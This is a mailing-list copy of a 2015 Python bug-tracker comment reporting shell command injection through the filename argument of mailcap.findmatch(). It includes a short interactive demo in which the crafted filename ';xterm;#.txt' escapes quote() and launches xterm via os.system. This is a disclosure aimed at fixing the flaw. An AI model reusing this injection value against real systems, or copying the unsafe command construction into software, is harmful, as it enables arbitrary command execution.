[issue24778] mailcap.findmatch() ........ Shell Command Injection in filename

Bernd Dietzel report at bugs.python.org
Mon Aug 3 22:31:07 CEST 2015


Bernd Dietzel added the comment:

Exploid Demo wich works with quote() : 

>>> commandline,MIMETYPE=mailcap.findmatch(d, 'text/*', filename=quote(';xterm;#.txt'))
>>> commandline
"less '';xterm;#.txt''"
>>> os.system(commandline)
### xterm starts

----------

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24778>
_______________________________________


More information about the Python-bugs-list mailing list